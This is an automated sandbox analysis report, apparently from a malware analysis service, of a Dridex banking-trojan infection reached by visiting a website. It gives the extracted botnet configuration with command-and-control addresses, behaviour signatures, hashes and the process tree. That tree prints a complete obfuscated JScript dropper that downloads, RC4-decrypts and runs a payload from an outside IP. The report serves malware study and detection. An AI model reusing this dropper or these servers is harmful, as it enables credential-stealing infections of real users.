Resubmissions

02-06-2021 08:33

210602-ft6tcnm7l6 10

31-05-2021 23:55

210531-sga8xmymq2 1

Analysis

  • max time kernel
    134s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02-06-2021 08:33

General

  • Target

    http://magickpeoplenew.xyz/

  • Sample

    210602-ft6tcnm7l6

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

162.214.106.107:13783

46.231.204.10:8172

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex (known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://magickpeoplenew.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3588
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c zmseu.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4124
            • C:\Users\Admin\AppData\Local\Temp\zmseu.exe
              zmseu.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4168

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

  • Modify Registry (1) T1112

Discovery

  • Query Registry (1) T1012
  • System Information Discovery (2) T1082

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    71d7a044701948ca4e59aa37f5d94260

    SHA1

    4952051481ef52d8fa5eb95b7832729dfc5e0bb4

    SHA256

    bb7642da343e083585a1b00d995039544037747c542eb7937726692f9c388dfa

    SHA512

    16bb691baa401ac3c5b7424a0bf2248cc1226839960cbe6bf484fc898f4c06a85226181386ecb83064c5bb36de9b099f24294ea044bed3176b67fb0298f5159f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    eb4e278cf28565d97c25d1b4943d6171

    SHA1

    54054fd6e9e9340d8484b775e03a44ea7a300d74

    SHA256

    11ffd302a3cb7d9a6e759770b46f85b190babb2445ab5482ad97781cac12b400

    SHA512

    37ae2d925c7a0a49e3041c263199e9ec58a240070dd313bcbb69d60469d3628f18437f64e0dcc660b159b3b9bd11703c2f78101189b75fdfea491ecba5ee093d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\317KXRBC.cookie
    MD5

    5ebcfad97f1996029771479b350f18cc

    SHA1

    28a121674ae2f4d592432b4051ff66eb294f970c

    SHA256

    8ca05547931b118d68d4ef049182efe841856cc042519bdfb2265254382ea04a

    SHA512

    da899d8e36e0897d4f69b4c76e0cb3fccc6585bbd25c68cab5c6f58d355da717a3194b151b3095aa9e0846d66875de8dfa76eb163040cfd506d4da8e6e01a7ea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\42CKLL15.cookie
    MD5

    94a941e5277e6ef89c5ff5169d8c004a

    SHA1

    a3fc34a2de2e4012431cd19ddcecb56791ae1c72

    SHA256

    05d2a1a1dd487dba84c828b39eccb31953257475c5975457d077181a187e1347

    SHA512

    91642d285c74e742df124206e4331663560860beb60b86d58150eb9222be66058ba7673088464154c1b9368353cf42363c8578cc94bb304158a80a74454ad41c

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\zmseu.exe
    MD5

    88cdcb149db6ecf35adbdeecb8dcdf35

    SHA1

    45445ad72c0ca8c9e1fb5a9c068d0c185f481030

    SHA256

    6a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9

    SHA512

    4dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896

  • memory/1388-116-0x0000000000000000-mapping.dmp
  • memory/1796-115-0x0000000000000000-mapping.dmp
  • memory/2208-114-0x00007FF834CA0000-0x00007FF834D0B000-memory.dmp
    Filesize

    428KB

  • memory/3588-117-0x0000000000000000-mapping.dmp
  • memory/4124-119-0x0000000000000000-mapping.dmp
  • memory/4168-120-0x0000000000000000-mapping.dmp
  • memory/4168-124-0x0000000000400000-0x0000000000550000-memory.dmp
    Filesize

    1.3MB

  • memory/4168-123-0x0000000000550000-0x000000000069A000-memory.dmp
    Filesize

    1.3MB